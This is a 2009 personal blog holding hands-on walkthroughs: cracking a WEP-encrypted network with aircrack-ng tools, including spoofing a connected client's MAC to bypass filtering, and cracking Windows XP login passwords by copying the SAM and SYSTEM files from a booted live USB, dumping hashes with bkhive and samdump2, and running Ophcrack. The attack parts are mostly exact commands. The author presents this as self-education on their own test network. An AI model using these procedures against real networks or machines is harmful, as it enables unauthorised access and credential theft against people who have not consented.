Sunday, 12 April 2009

Going wireless - Part 2 - WEP

In this example, my test victim setup is as follows;

* WEP encrypted network
* MAC filtering enabled
* Hidden SSID (SMC)
* Client connected to network

Tools used are all included on the BackTrack 3 live CD.
Will be using a wireless USB adapter from Linksys (WUSB54GC).

So after booting up into BackTrack, we open up a shell and prepare the wireless interface;
> iwconfig rausb0 rate 1M

Then start up airodump to scan for networks around.
As only interested in WEP networks I apply a filter to scan only for WEP networks.
> airodump-ng rausb0 -t WEP
After picking up 5 in under 2 minutes (?! really..) I see my victim network and apply filters in airodump to single it out;
> airodump-ng rausb0 -c 3 --bssid 00:13:D4:09:32:60

Even though the SSID is not being broadcast, airodump picks up the SSID as soon as there is activity from any clients already on the network or one connecting to the network.
In this case there is a client connected.

All the info necessary is there to start the WEP hacking process. Lets have at it !

Lets try to associate with the network.
> aireplay-ng -1 0 -a 00:13:D4:09:32:60 -e SMC rausb0

Drat, the above shows that MAC filtering is enabled, so we need a valid MAC address.
But we are in luck !
We saw above that there was a client connected, so we just 'steal' that MAC address ;

For me to get that to work when using the linksys adapter I need to stop it and start it ;
> modprobe -r rt73
> modprobe rt73
> ifconfig rausb0 down
> macchanger --mac 06:15:AF:B5:F7:79 rausb0
> ifconfig rausb0 up

Now we try to associate again;

Success !

Now we stop and restart airodump with an additional command to capture IVs and save to file which I will call SMC following the SSID, this filename can be anything you like;
> airodump-ng rausb0 -c 3 --bssid 00:13:D4:09:32:60 -w SMC --ivs

Then we start up aireplay again with an arp-replay attack, this will generate a mass of traffic which we can then use to crack the WEP key.

> aireplay-ng -3 -b 00:13:D4:09:32 rausb0

We now open up a new shell and start up aircrack;
> aircrack-ng -0 -b 00:13:D4:09:32:60 SMC-01*.ivs
After a few minutes ;

Success !

The above is based on some activity on the network, to get the arps running.

Connecting to the network is one thing, getting an IP address another..

But if the real client logs off, chances are you will be able to connect and do a dhcpcd to
get an IP address. Otherwise you will have to deauth the real client to allow yours to connect.

Saturday, 11 April 2009

Going wireless - Part 1 - Intro

So after having figured out what all the fuss was about with the wireless security, I figured out that having my Wireless Network still encrypted with WEP was a bad thing..
Dont worry, this was a while ago..
Basically I needed WEP in order to be able to hook up an ancient laptop, changed that pretty quick as you can imagine.

As before, all the below is old, in this case very old news, but the techniques are improving every day and the amount of time needed is shortening.

I was amazed at how easy it was to hack into wireless networks, I was even more surprised at how much information on hacking was readily available as well.. scary actually.
So instead of leaving myself blissfully unaware, I decided to learn and try to stay protected.

Basically any protection is better than none as the casual war-drivers / hackers prefer easy access, however WEP does not count as protection any more.
There are automated tools (spoonwep) which will simplify the process and even if doing it step by step, it shouldn't take longer than 5-10 minutes to fully compromise a network encrypted with WEP.
All the tools needed are readily available and free to boot.

What you often read in magazines is that you should;
  1. Use a strong encryption (WPA / WPA2)
  2. Hide your network by not broadcasting the network ESSID
  3. Use MAC address filtering to ensure only allowed MAC addresses are allowed to connect to the network.
  4. The more aware magazines even suggest that the wireless router is even turned off when not in use.
Although extra layers of protection such as MAC filtering and hiding the network ESSID are never a bad idea, the only sure way to keep your wireless network safe is using #4.
  • WEP network encryption is broken.
  • WPA/WPA2 encryption is only as strong as the password; use "12345678" as a password and its going to be cracked real quick. Using something like '!H4V341337p4$$\/\/0Rd' will make a would-be attacker's job a lot harder.
  • Hiding the SSID doesn't work either, it can be cracked and if the network is monitored by a would-be attacker, the SSID will pop up as soon as someone associates.
  • Even if you use MAC address filtering, in theory it can be cracked (if someone has the patience) and otherwise, simply monitoring the network for a valid MAC address to associate and then spoofing it, is a real possibility.

Next stop will be some examples on hacking and cracking a test setup I have.

Cracking Windows login passwords

All of this is old news, but still new and fascinating to me ;) hence the detailed post !

Scenario is that you do not have access to windows, you need the login and password.
(and thus of course a 2nd pc to do the cracking ;) )

The tools used were ;
* BackTrack 3 Final live-usb
* Ophcrack (using the XP special rainbow tables)

The hack / crack is based on having physical access to the machine in question, and assuming it is running Windows XP.
Basically the sequence of events is as follows -->
* Booting up with the BackTrack live-usb/cd;
* Copy the files from the windows system with logins and passwords and keys to extract them;
* Extract the hashes from the SAM file;
* Crack the hashes using OPHcrack

After booting up BT3 and opening up a shell type the 'df' command to see which drives are mounted ;

In this case sda1 and sda2 are on the laptop, the sda2 partition has Windows on it.
sdb1 is my flashdrive running BT3 and sdc is my extra flashdrive for saving the password hashes later as I will crack these on my other PC.

Now to head over to the directory in the Windows partition to find and copy the files we need to work with, which are the SAM file and the SYSTEM file.
cd /mnt/sda2/WINDOWS/system32/config/

Now to copy the SAM and SYSTEM file to the flashdrive.
cp SAM /mnt/sdc/
cp SYSTEM /mnt/sdc/

Now we have the the files we need, we switch to the folder where we copied the files and use the tool 'bkhive' to extract the information necessary to dump the hashes from the SAM file.
cd /mnt/sdc/
bkhive system key

Now we can use the key to dump the hashes from the SAM file using the tool 'samdump2'.
samdump2 sam key
to copy the hashes to a text file for cracking later;
samdump2 sam key > /mnt/sdc/hashes.txt

So now we have a list of users and the hashes for their passwords in the file 'hashes.txt' !

Stage 2.. cracking the hashes with Ophcrack..

Ophcrack is a free windows password cracker that uses rainbow tables (pre-computed password hashes) it can be run off a live-cd as well, however I found the actual installed program to better fit my purpose.

There are a couple of free rainbow tables free for download, these will normally grab the easy passwords, however I had the most success with the the 'XP special' rainbow tables.
These included more characters and although it obviously takes longer to crunch the numbers, the results are fantastic.

So, assuming Ophcrack is installed on your system and that you have downloaded at least the 'XP free small' and the 'XP free fast' tables ;

Fire up Ophcrack, click on the 'Tables' icon and install the tables by browsing to the directory where they are located. Click OK and the screen should look something like the below.

Next click on the 'Load' icon and choose the 'PWDUMP file' and browse to your 'hashes.txt' file that was made in the previous step with BT3.

Then click on the 'Crack' icon and let Ophcrack do its thing !
It is a CPU intensive process and took my lowly PC over 4min to complete..
Without success using the XP free fast tables..

Using the XP special tables however, it takes a lot longer, but with MUCH better results ;

So there you have it, the longest part of doing the above will be the downloading of the tools and tables ;)

An optimized way to do the above is to get an 8Gig thumb drive (the XP special tables are over 7Gig, whereas the tables included on the Ophcrack live-cd are under 400mb and contain a lot less possible passwords), make it a bootable Ophcrack usb drive and replace the tables in the Opcrack/tables directory with the XP special tables.
Doing this enabled me to do the above in one step by booting into the system with the Opcrack live-usb and carry out the windows password cracks directly.
This reduced the time necessary to do the above down to under 11 min !
(This in no small part due to amount of RAM, my desktop only has 2gig whereas my laptop has 3gig RAM, the more the merrier!)


Well goes to show that research is still your best friend !

There is an Ophcrack module available ophcrack-3.0.lzm which can be downloaded from the great french blog and then placed in your BackTrack3, modules folder.

This way if you have a large flashdrive, you can boot in BT3, run the ophcrack module, point to your rainbow tables, and off you go !

Assuming you have downloaded the above ophcrack module and have correctly placed in your modules folder, proceed as follows;

> Boot up in BT3F
> Open a shell and type ophcrack for options;

Then type in the code;
ophcrack -g -d /mnt/sdb1/OPHcrack/ -t /mnt/sdb1/OPHcrack/XP_Special/ -w /mnt/sda2/WINDOWS/system32/config/
(In my case the tables are in a folder called OPHcrack on my usb drive from which BT is running, and windows is on my sda2, really though just follow the code instructions as above and you can't go wrong, but remember that the path is case sensitive !)

So as you can see the whole process for the cracking took about 19 minutes to chunk through around 7gigs worth of tables.
Not that bad !
Google Analytics Alternative